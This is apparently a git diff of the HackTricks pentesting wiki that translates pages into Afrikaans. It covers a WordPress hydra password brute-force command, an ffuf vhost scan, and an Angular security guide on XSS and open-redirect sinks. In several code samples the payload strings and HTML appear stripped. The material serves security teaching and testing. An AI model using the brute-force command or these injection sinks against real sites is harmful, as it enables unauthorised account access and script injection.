 
 Entry_11:
-  Name: WordPress Hydra Brute Force
-  Description: Need User (admin is default)
-  Command: hydra -l admin -P {Big_Passwordlist} {IP} -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
+Name: WordPress Hydra Brute Force
+Description: Need User (admin is default)
+Command: hydra -l admin -P {Big_Passwordlist} {IP} -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
 
 Entry_12:
-  Name: Ffuf Vhost
-  Description: Simple Scan with Ffuf for discovering additional vhosts
-  Command: ffuf -w {Subdomain_List}:FUZZ -u {Web_Proto}://{Domain_Name} -H "Host:FUZZ.{Domain_Name}" -c -mc all {Ffuf_Filters}
+Name: Ffuf Vhost
+Description: Simple Scan with Ffuf for discovering additional vhosts
+Command: ffuf -w {Subdomain_List}:FUZZ -u {Web_Proto}://{Domain_Name} -H "Host:FUZZ.{Domain_Name}" -c -mc all {Ffuf_Filters}
 ```
-
 \
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
+**Foutbounty wenk**: **teken aan** vir **Intigriti**, 'n premium **foutbounty platform geskep deur hackers, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) en begin om belonings te verdien tot **$100,000**!
 
 {% embed url="https://go.intigriti.com/hacktricks" %}
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 

diff --git a/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md b/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md
index a46bd74ce..0e228599f 100644
--- a/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md
+++ b/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md
@@ -1,36 +1,32 @@
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

 
 
-Find vulnerabilities and missconfigurations with [https://github.com/0ang3el/aem-hacker](https://github.com/0ang3el/aem-hacker)
+Vind kwesbaarhede en verkeerde konfigurasies met [https://github.com/0ang3el/aem-hacker](https://github.com/0ang3el/aem-hacker)
 
 
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

-
-
diff --git a/network-services-pentesting/pentesting-web/angular.md b/network-services-pentesting/pentesting-web/angular.md
index c22868275..67e0968f2 100644
--- a/network-services-pentesting/pentesting-web/angular.md
+++ b/network-services-pentesting/pentesting-web/angular.md
@@ -1,27 +1,26 @@
 # Angular
 
-## The Checklist
+## Die Kontrolelys
 
-Checklist [from here](https://lsgeurope.com/post/angular-security-checklist).
+Kontrolelys [van hier](https://lsgeurope.com/post/angular-security-checklist).
 
-* [ ] Angular is considered a client-side framework and is not expected to provide server-side protection
-* [ ] Sourcemap for scripts is disabled in the project configuration
-* [ ] Untrusted user input is always interpolated or sanitized before being used in templates
-* [ ] The user has no control over server-side or client-side templates
-* [ ] Untrusted user input is sanitized using an appropriate security context before being trusted by the application
-  * [ ] `BypassSecurity*` methods are not used with untrusted input
-* [ ] Untrusted user input is not passed to Angular classes such as `ElementRef` , `Renderer2` and `Document`, or other JQuery/DOM sinks
+* [ ] Angular word beskou as 'n kliëntkant-raamwerk en daar word nie verwag dat dit bedienerskant-beskerming sal bied nie
+* [ ] Sourcemap vir skripte is gedeaktiveer in die projekkonfigurasie
+* [ ] Onbetroubare gebruikersinsette word altyd geïnterpoleer of gesaniteer voordat dit in sjablone gebruik word
+* [ ] Die gebruiker het geen beheer oor bedienerskant- of kliëntkant-sjablone nie
+* [ ] Onbetroubare gebruikersinsette word gesaniteer deur 'n toepaslike sekuriteitskonteks voordat dit deur die toepassing vertrou word
+* [ ] `BypassSecurity*`-metodes word nie gebruik met onbetroubare insette nie
+* [ ] Onbetroubare gebruikersinsette word nie aan Angular-klasse soos `ElementRef`, `Renderer2` en `Document`, of ander JQuery/DOM-bronne oorgedra nie
 
-## What is Angular
+## Wat is Angular
 
-Angular is a **powerful** and **open-source** front-end framework maintained by **Google**. It uses **TypeScript** to enhance code readability and debugging. With strong security mechanisms, Angular prevents common client-side vulnerabilities like **XSS** and **open redirects**. It can be used on the **server-side** too, making security considerations important from **both angles**.
+Angular is 'n **kragtige** en **open-source** front-end-raamwerk wat deur **Google** onderhou word. Dit gebruik **TypeScript** om koderingsleesbaarheid en foutopsporing te verbeter. Met sterk sekuriteitsmeganismes voorkom Angular algemene kliëntkant-veiligheidskwesbaarhede soos **XSS** en **open omleidings**. Dit kan ook aan die **bedienerskant** gebruik word, wat sekuriteitsoorwegings van **beide kante** belangrik maak.
 
-## Framework architecture
+## Raamwerkargitektuur
 
-In order to better understand the Angular basics, let’s go through its essential concepts.
-
-Common Angular project usually looks like:
+Om die basiese konsepte van Angular beter te verstaan, gaan ons deur sy essensiële konsepte.
 
+'n Gewone Angular-projek lyk gewoonlik soos:
 ```bash
 my-workspace/
 ├── ... #workspace-wide configuration files
@@ -40,574 +39,559 @@ my-workspace/
 ├── angular.json #provides workspace-wide and project-specific configuration defaults
 └── tsconfig.json #provides the base TypeScript configuration for projects in the workspace
 ```
+Volgens die dokumentasie het elke Angular-toepassing ten minste een komponent, die hoofkomponent (`AppComponent`), wat 'n komponenthiërargie met die DOM verbind. Elke komponent definieer 'n klas wat toepassingsdata en logika bevat, en word geassosieer met 'n HTML-sjabloon wat 'n aansig definieer wat in 'n teikenomgewing vertoon moet word. Die `@Component()`-versierder identifiseer die klas onmiddellik daaronder as 'n komponent en voorsien die sjabloon en verwante komponentspesifieke metadata. Die `AppComponent` word in die `app.component.ts`-lêer gedefinieer.
 
-According to the documentation, every Angular application has at least one component, the root component (`AppComponent`) that connects a component hierarchy with the DOM. Each component defines a class that contains application data and logic, and is associated with an HTML template that defines a view to be displayed in a target environment. The `@Component()` decorator identifies the class immediately below it as a component, and provides the template and related component-specific metadata. The `AppComponent` is defined in the `app.component.ts` file.
+Angular NgModules verklaar 'n samestellingskonteks vir 'n stel komponente wat toegewy is aan 'n toepassingsdomein, 'n werkstroom of 'n nou verwante stel vermoëns. Elke Angular-toepassing het 'n hoofmodule, konvensioneel genaamd `AppModule`, wat die opstartmeganisme verskaf wat die toepassing begin. 'n Toepassing bevat tipies baie funksionele modules. Die `AppModule` word in die `app.module.ts`-lêer gedefinieer.
 
-Angular NgModules declare a compilation context for a set of components that is dedicated to an application domain, a workflow, or a closely related set of capabilities. Every Angular application has a root module, conventionally named `AppModule`, which provides the bootstrap mechanism that launches the application. An application typically contains many functional modules. The `AppModule` is defined in the `app.module.ts` file.
+Die Angular `Router` NgModule verskaf 'n diens wat jou in staat stel om 'n navigasiepad tussen die verskillende toepassingsstatusse en aanskouingshiërargieë in jou toepassing te definieer. Die `RouterModule` word in die `app-routing.module.ts`-lêer gedefinieer.
 
-The Angular `Router` NgModule provides a service that lets you define a navigation path among the different application states and view hierarchies in your application. The `RouterModule`is defined in the `app-routing.module.ts` file.
+Vir data of logika wat nie met 'n spesifieke aansig geassosieer is nie en wat jy wil deel tussen komponente, skep jy 'n diensklas. 'n Diensklasdefinisie word onmiddellik deur die `@Injectable()`-versierder gevolg. Die versierder voorsien die metadata wat dit moontlik maak dat ander verskaffers as afhanklikhede in jou klas ingespuit kan word. Afhanklikheidsinspuiting (DI) stel jou in staat om jou komponentklasse slank en doeltreffend te hou. Hulle haal nie data van die bediener op, valideer gebruikersinsette nie, of log direk na die konsole nie; hulle delegeer sulke take aan dienste.
 
-For data or logic that isn't associated with a specific view, and that you want to share across components, you create a service class. A service class definition is immediately preceded by the `@Injectable()` decorator. The decorator provides the metadata that allows other providers to be injected as dependencies into your class. Dependency injection (DI) lets you keep your component classes lean and efficient. They don't fetch data from the server, validate user input, or log directly to the console; they delegate such tasks to services.
-
-## Sourcemap configuration
-
-Angular framework translates TypeScript files into JavaScript code by following `tsconfig.json` options and then builds a project with `angular.json` configuration. Looking at `angular.json` file, we observed an option to enable or disable a sourcemap. According to the Angular documentation, the default configuration has a sourcemap file enabled for scripts and is not hidden by default:
+## Sourcemap-konfigurasie
 
+Die Angular-raamwerk vertaal TypeScript-lêers na JavaScript-kode deur die `tsconfig.json`-opsies te volg en bou dan 'n projek met die `angular.json`-konfigurasie. Deur na die `angular.json`-lêer te kyk, het ons 'n opsie opgemerk om 'n sourcemap in of uit te skakel. Volgens die Angular-dokumentasie het die verstekkonfigurasie 'n sourcemap-lêer wat ingeskakel is vir skripte en nie standaard versteek is nie:
 ```json
 "sourceMap": {
-	"scripts": true,
-	"styles": true,
-	"vendor": false,
-	"hidden": false
+"scripts": true,
+"styles": true,
+"vendor": false,
+"hidden": false
 }
 ```
-
-Generally, sourcemap files are utilized for debugging purposes as they map generated files to their original files. Therefore, it is not recommended to use them in a production environment. If sourcemaps are enabled, it improves the readability and aids in file analysis by replicating the original state of the Angular project. However, if they are disabled, a reviewer can still analyze a compiled JavaScript file manually by searching for anti-security patterns.
-
-Furthemore, a compiled JavaScript file with an Angular project can be found in the browser developer tools → Sources (or Debugger and Sources) → \[id].main.js. Depending on the enabled options, this file may contain the following row in the end `//# sourceMappingURL=[id].main.js.map` or it may not, if the **hidden** option is set to **true**. Nonetheless, if the sourcemap is disabled for **scripts**, testing becomes more complex, and we cannot obtain the file. In addition, sourcemap can be enabled during project build like `ng build --source-map`.
-
 ## Data binding
 
-Binding refers to the process of communication between a component and its corresponding view. It is utilized for transferring data to and from the Angular framework. Data can be passed through various means, such as through events, interpolation, properties, or through the two-way binding mechanism. Moreover, data can also be shared between related components (parent-child relation) and between two unrelated components using the Service feature.
+Binding verwys na die proses van kommunikasie tussen 'n komponent en sy ooreenstemmende weergawe. Dit word gebruik om data oor te dra na en van die Angular-raamwerk. Data kan deur verskillende middels oorgedra word, soos deur gebeure, interpolasie, eienskappe, of deur die tweerigtingbinding meganisme. Verder kan data ook gedeel word tussen verwante komponente (ouer-kind verhouding) en tussen twee onverwante komponente deur die gebruik van die Diens-funksie.
 
-We can classify binding by data flow:
+Ons kan binding klassifiseer volgens die data-vloei:
 
-* Data source to view target (includes _interpolation_, _properties_, _attributes_, _classes_ and _styles_); can be applied by using `[]` or `{{}}` in template;
-* View target to data source (includes _events_); can be applied by using `()` in template;
-* Two-Way; can be applied by using `[()]` in template.
+* Data-bron na weergawe-teiken (sluit interpolasie, eienskappe, eienskappe, klasse en style in); kan toegepas word deur `[]` of `{{}}` in die sjabloon te gebruik;
+* Weergawe-teiken na data-bron (sluit gebeure in); kan toegepas word deur `()` in die sjabloon te gebruik;
+* Tweerigting; kan toegepas word deur `[()]` in die sjabloon te gebruik.
 
-Binding can be called on properties, events, and attributes, as well as on any public member of a source directive:
+Binding kan toegepas word op eienskappe, gebeure en eienskappe, sowel as op enige openbare lid van 'n bronrigting:
 
-| TYPE      | TARGET                                                   | EXAMPLES                                                             |
+| SOORT     | TEIKEN                                                   | VOORBEELDE                                                          |
 | --------- | -------------------------------------------------------- | -------------------------------------------------------------------- |
-| Property  | Element property, Component property, Directive property | \                      |
-| Event     | Element event, Component event, Directive event          | \
-    ```
-*   To set the property of a DOM element, you can use `Renderer2.setProperty()` method and trigger an XSS attack:
+//app.component.html
+
+
+```
+*   Om die eienskap van 'n DOM-element in te stel, kan jy die `Renderer2.setProperty()` metode gebruik en 'n XSS-aanval veroorsaak:
 
-    ```tsx
-    //app.component.ts
-    import {Component, Renderer2, ElementRef, ViewChild, AfterViewInit } from '@angular/core';
+```tsx
+//app.component.ts
+import {Component, Renderer2, ElementRef, ViewChild, AfterViewInit } from '@angular/core';
 
-    @Component({
-      selector: 'app-root',
-      templateUrl: './app.component.html',
-      styleUrls: ['./app.component.css']
-    })
-    export class AppComponent {
-      
-      public constructor (
-        private renderer2: Renderer2
-      ){}
-      @ViewChild("img") img!: ElementRef;
+@Component({
+selector: 'app-root',
+templateUrl: './app.component.html',
+styleUrls: ['./app.component.css']
+})
+export class AppComponent {
 
-      setProperty(){
-        this.renderer2.setProperty(this.img.nativeElement, 'innerHTML', '');
-     }
-    }
+public constructor (
+private renderer2: Renderer2
+){}
+@ViewChild("img") img!: ElementRef;
 
-    //app.component.html
-    
-    
-    ```
+setProperty(){
+this.renderer2.setProperty(this.img.nativeElement, 'innerHTML', '');
+}
+}
 
-During our research, we also examined the behavior of other `Renderer2` methods, such as `setStyle()`, `createComment()`, and `setValue()`, in relation to XSS and CSS injections. However, we were unable to find any valid attack vectors for these methods due to their functional limitations.
+//app.component.html
+
+
+```
+
+Tydens ons navorsing het ons ook die gedrag van ander `Renderer2` metodes, soos `setStyle()`, `createComment()` en `setValue()`, in verband met XSS- en CSS-injeksies ondersoek. Ons kon egter geen geldige aanvalsvektore vir hierdie metodes vind as gevolg van hul funksionele beperkings nie.
 
 #### jQuery
 
-jQuery is a fast, small, and feature-rich JavaScript library that can be used in the Angular project to help with manipulation the HTML DOM objects. However, as it is known, this library’s methods may be exploited to achieve an XSS vulnerability. In order to discuss how some vulnerable jQuery methods can be exploited in Angular projects, we added this subsection.
+jQuery is 'n vinnige, klein en funksierike JavaScript-biblioteek wat in die Angular-projek gebruik kan word om te help met die manipulasie van die HTML DOM-voorwerpe. Dit is egter bekend dat hierdie biblioteek se metodes uitgebuit kan word om 'n XSS-kwesbaarheid te bereik. Om te bespreek hoe sommige kwesbare jQuery-metodes in Angular-projekte uitgebuit kan word, het ons hierdie subafdeling bygevoeg.
 
-*   The `html()` method gets the HTML contents of the first element in the set of matched elements or sets the HTML contents of every matched element. However, by design, any jQuery constructor or method that accepts an HTML string can potentially execute code. This can occur by injection of `");
-        });
-      }
-    }
+@Component({
+selector: 'app-root',
+templateUrl: './app.component.html',
+styleUrls: ['./app.component.css']
+})
+export class AppComponent implements OnInit
+{
+ngOnInit()
+{
+$("button").on("click", function()
+{
+$("p").html("");
+});
+}
+}
 
-    //app.component.html
-    
-    
some text here

-    ```
-*   The `jQuery.parseHTML()` method uses native methods to convert the string to a set of DOM nodes, which can then be inserted into the document.
+//app.component.html
+
+
iets teks hier

+```
+*   Die `jQuery.parseHTML()` metode gebruik inheemse metodes om die string na 'n stel DOM-node om te skakel, wat dan in die dokument ingevoeg kan word.
 
-    ```tsx
-    jQuery.parseHTML(data [, context ] [, keepScripts ])
-    ```
+```tsx
+jQuery.parseHTML(data [, context ] [, keepScripts ])
+```
 
-    As mentioned before, most jQuery APIs that accept HTML strings will run scripts that are included in the HTML. The `jQuery.parseHTML()` method does not run scripts in the parsed HTML unless `keepScripts` is explicitly `true`. However, it is still possible in most environments to execute scripts indirectly; for example, via the `` attribute.
+Soos voorheen genoem, sal die meeste jQuery-API's wat HTML-strings aanvaar, skripte uitvoer wat in die HTML ingesluit is. Die `jQuery.parseHTML()` metode voer nie skripte in die geparseerde HTML uit tensy `keepScripts` uitdruklik `true` is nie. Dit is egter steeds moontlik om in die meeste omgewings skripte indirek uit te voer; byvoorbeeld via die ``-eienheid.
 
-    ```tsx
-    //app.component.ts
-    import { Component, OnInit } from '@angular/core';
-    import * as $ from 'jquery';
+```tsx
+//app.component.ts
+import { Component, OnInit } from '@angular/core';
+import * as $ from 'jquery';
 
-    @Component({
-      selector: 'app-root',
-      templateUrl: './app.component.html',
-      styleUrls: ['./app.component.css']
-    })
-    export class AppComponent implements OnInit 
-    {
-      ngOnInit() 
-      {
-        $("button").on("click", function()
-        {
-          var $palias = $("#palias"),
-            str = "",
-            html = $.parseHTML(str),
-            nodeNames = [];
-          $palias.append(html);
-        });
-      }
-    }
+@Component({
+selector: 'app-root',
+templateUrl: './app.component.html',
+styleUrls: ['./app.component.css']
+})
+export class AppComponent implements OnInit
+{
+ngOnInit()
+{
+$("button").on("click", function()
+{
+var $palias = $("#palias"),
+str = "",
+html = $.parseHTML(str),
+nodeNames = [];
+$palias.append(html);
+});
+}
+}
 
-    //app.component.html
-    
-    
some text

-    ```
+//app.component.html
+
+
iets teks

+```
 
-### Open redirects
+### Oop omleidings
 
-#### DOM interfaces
+#### DOM-koppelvlakke
 
-According to the W3C documentation, the `window.location` and `document.location` objects are treated as aliases in modern browsers. That is why they have similar implementation of some methods and properties, which might cause an open redirect and DOM XSS with `javascript://` schema attacks as mentioned below.
+Volgens die W3C-dokumentasie word die `window.location` en `document.location` voorwerpe as aliase in moderne webblaaier behandel. Dit is waarom hulle soortgelyke implementering van sommige metodes en eienskappe het, wat 'n oop omleiding en DOM XSS met `javascript://`-skema-aanvalle kan veroorsaak, soos hieronder genoem.
 
-*   `window.location.href`(and `document.location.href`)
+*   `window.location.href`(en `document.location.href`)
 
-    The canonical way to get the current DOM location object is using `window.location`. It can also be used to redirect the browser to a new page. As a result, having control over this object allows us to exploit an open redirect vulnerability.
+Die kanonieke manier om die huidige DOM-plekvoorwerp te kry, is deur `window.location` te gebruik. Dit kan ook gebruik word om die blaaier na 'n nuwe bladsy om te lei. As gevolg hiervan stel die beheer oor hierdie voorwerp ons in staat om 'n oop omleiding-kwesbaarheid uit te buit.
 
-    ```tsx
-    //app.component.ts
-    ...
-    export class AppComponent {
-        goToUrl(): void {
-          window.location.href = "https://google.com/about"
-        }
-    }
+```tsx
+//app.component.ts
+...
+export class AppComponent {
+goToUrl(): void {
+window.location.href = "https://google.com/about"
+}
+}
 
-    //app.component.html
-    
-    ```
+//app.component.html
+
+```
 
-    The exploitation process is identical for the following scenarios.
-*   `window.location.assign()`(and `document.location.assign()`)
+Die uitbuitingsproses is identies vir die volgende scenario's.
+*   `window.location.assign()`(en `document.location.assign()`)
 
-    This method causes the window to load and display the document at the URL specified. If we have control over this method, it might be a sink for an open redirect attack.
+Hierdie metode veroorsaak dat die venster die dokument by die gespesifiseerde URL laai en vertoon. As ons beheer oor hierdie metode het, kan dit 'n put wees vir 'n oop omleiding-aanval.
 
-    ```tsx
-    //app.component.ts
-    ...
-    export class AppComponent {
-        goToUrl(): void {
-          window.location.assign("https://google.com/about")
-        }
-    }
-    ```
-*   `window.location.replace()`(and `document.location.replace()`)
+```tsx
+//app.component.ts
+...
+export class AppComponent {
+goToUrl(): void {
+window.location.assign("https://google.com/about")
+}
+}
+```
+*   `window.location.replace()`(en `document.location.replace()`)
 
-    This method replaces the current resource with the one at the provided URL.
+Hierdie metode vervang die huidige bron met die een by die verskafte URL.
 
-    This differs from the `assign()` method is that after using `window.location.replace()`, the current page will not be saved in session History. However, it is also possible to exploit an open redirect vulnerability when we have control over this method.
+Die verskil tussen hierdie metode en die `assign()`-metode is dat nadat `window.location.replace()` gebruik is, sal die huidige bladsy nie in die sessiegeskiedenis gestoor word nie. Dit is egter ook moontlik om 'n oop omleiding-kwesbaarheid uit te buit wanneer ons beheer oor hierdie metode het.
 
-    ```tsx
-    //app.component.ts
-    ...
-    export class AppComponent {
-        goToUrl(): void {
-          window.location.replace("http://google.com/about")
-        }
-    }
-    ```
+```tsx
+//app.component.ts
+...
+export class AppComponent {
+goToUrl(): void {
+window.location.replace("http://google.com/about")
+}
+}
+```
 *   `window.open()`
 
-    The `window.open()` method takes a URL and loads the resource it identifies into a new or existing tab or window. Having control over this method might also be an opportunity to trigger an XSS or open redirect vulnerability.
+Die `window.open()`-metode neem 'n URL en laai die bron wat dit identifiseer in 'n nuwe of bestaande oortjie of venster. Beheer oor hierdie metode kan ook 'n geleentheid wees om 'n XSS- of oop omleiding-kwesbaarheid te veroorsaak.
 
-    ```tsx
-    //app.component.ts
-    ...
-    export class AppComponent {
-        goToUrl(): void {
-          window.open("https://google.com/about", "_blank")
-        }
-    }
-    ```
+```tsx
+//app.component.ts
+...
+export class AppComponent {
+goToUrl(): void {
+window.open("https://google.com/about", "_blank")
+}
+}
+```
+#### Angular klasse
 
-#### Angular classes
+*   Volgens die Angular-dokumentasie is die Angular `Document` dieselfde as die DOM-dokument, wat beteken dat dit moontlik is om algemene vektore vir die DOM-dokument te gebruik om kliëntkant kwesbaarhede in die Angular uit te buit. `Document.location` eienskappe en metodes kan moontlike sinks wees vir suksesvolle oop omleidingsaanvalle, soos in die voorbeeld getoon:
 
-*   According to Angular documentation, Angular `Document` is the same as the DOM document, which means it is possible to use common vectors for the DOM document to exploit client-side vulnerabilities in the Angular. `Document.location` properties and methods might be sinks for successful open redirect attacks as shown in the example:
+```tsx
+//app.component.ts
+import { Component, Inject } from '@angular/core';
+import { DOCUMENT } from '@angular/common';
 
-    ```tsx
-    //app.component.ts
-    import { Component, Inject } from '@angular/core';
-    import { DOCUMENT } from '@angular/common';
+@Component({
+selector: 'app-root',
+templateUrl: './app.component.html',
+styleUrls: ['./app.component.css']
+})
+export class AppComponent {
+constructor(@Inject(DOCUMENT) private document: Document) { }
 
-    @Component({
-      selector: 'app-root',
-      templateUrl: './app.component.html',
-      styleUrls: ['./app.component.css']
-    })
-    export class AppComponent {
-      constructor(@Inject(DOCUMENT) private document: Document) { }
+goToUrl(): void {
+this.document.location.href = 'https://google.com/about';
+}
+}
 
-      goToUrl(): void {
-          this.document.location.href = 'https://google.com/about';
-      }
-    }
+//app.component.html
+
+```
+*   Tydens die navorsingsfase het ons ook die Angular `Location`-klas vir oop omleidingskwesbaarhede nagegaan, maar geen geldige vektore is gevind nie. `Location` is 'n Angular-diens wat programme kan gebruik om met die huidige URL van 'n blaaier te kommunikeer. Hierdie diens het verskeie metodes om die gegewe URL te manipuleer - `go()`, `replaceState()` en `prepareExternalUrl()`. Ons kan hulle egter nie gebruik vir omleiding na 'n eksterne domein nie. Byvoorbeeld:
 
-    //app.component.html
-    
-    ```
-*   During the research phase, we also reviewed Angular `Location` class for open redirect vulnerabilities, but no valid vectors were found. `Location` is an Angular service that applications can use to interact with a browser's current URL. This service has several methods to manipulate the given URL - `go()` , `replaceState()`, and `prepareExternalUrl()`. However, we cannot use them for redirection to the external domain. For example:
+```tsx
+//app.component.ts
+import { Component, Inject } from '@angular/core';
+import {Location, LocationStrategy, PathLocationStrategy} from '@angular/common';
 
-    ```tsx
-    //app.component.ts
-    import { Component, Inject } from '@angular/core';
-    import {Location, LocationStrategy, PathLocationStrategy} from '@angular/common';
+@Component({
+selector: 'app-root',
+templateUrl: './app.component.html',
+styleUrls: ['./app.component.css'],
+providers: [Location, {provide: LocationStrategy, useClass: PathLocationStrategy}],
+})
+export class AppComponent {
+location: Location;
+constructor(location: Location) {
+this.location = location;
+}
+goToUrl(): void {
+console.log(this.location.go("http://google.com/about"));
+}
+}
+```
 
-    @Component({
-      selector: 'app-root',
-      templateUrl: './app.component.html',
-      styleUrls: ['./app.component.css'],
-      providers: [Location, {provide: LocationStrategy, useClass: PathLocationStrategy}],
-    })
-    export class AppComponent {
-      location: Location;
-      constructor(location: Location) {
-        this.location = location;
-      }
-      goToUrl(): void {
-       console.log(this.location.go("http://google.com/about"));
-      }
-    }
-    ```
+Resultaat: `http://localhost:4200/http://google.com/about`
+*   Die Angular `Router`-klas word hoofsaaklik gebruik vir navigasie binne dieselfde domein en voeg geen addisionele kwesbaarhede tot die toepassing by nie:
 
-    Result: `http://localhost:4200/http://google.com/about`
-*   The Angular `Router` class is primarily used for navigating within the same domain and does not introduce any additional vulnerabilities to the application:
+```jsx
+//app-routing.module.ts
+const routes: Routes = [
+{ path: '', redirectTo: 'https://google.com', pathMatch: 'full' }]
+```
 
-    ```jsx
-    //app-routing.module.ts
-    const routes: Routes = [
-    { path: '', redirectTo: 'https://google.com', pathMatch: 'full' }]
-    ```
+Resultaat: `http://localhost:4200/https:`
 
-    Result: `http://localhost:4200/https:`
+Die volgende metodes navigeer ook binne die omvang van die domein:
 
-    The following methods also navigate within the domain’s scope:
+```jsx
+const routes: Routes = [ { path: '', redirectTo: 'ROUTE', pathMatch: 'prefix' } ]
+this.router.navigate(['PATH'])
+this.router.navigateByUrl('URL')
+```
 
-    ```jsx
-    const routes: Routes = [ { path: '', redirectTo: 'ROUTE', pathMatch: 'prefix' } ]
-    this.router.navigate(['PATH'])
-    this.router.navigateByUrl('URL')
-    ```
-
-## References
+## Verwysings
 
 * [Angular](https://angular.io/)
-* [Angular Security: The Definitive Guide (Part 1)](https://lsgeurope.com/post/angular-security-the-definitive-guide-part-1)
-* [Angular Security: The Definitive Guide (Part 2)](https://lsgeurope.com/post/angular-security-the-definitive-guide-part-2)
-* [Angular Security: The Definitive Guide (Part 3)](https://lsgeurope.com/post/angular-security-the-definitive-guide-part-3)
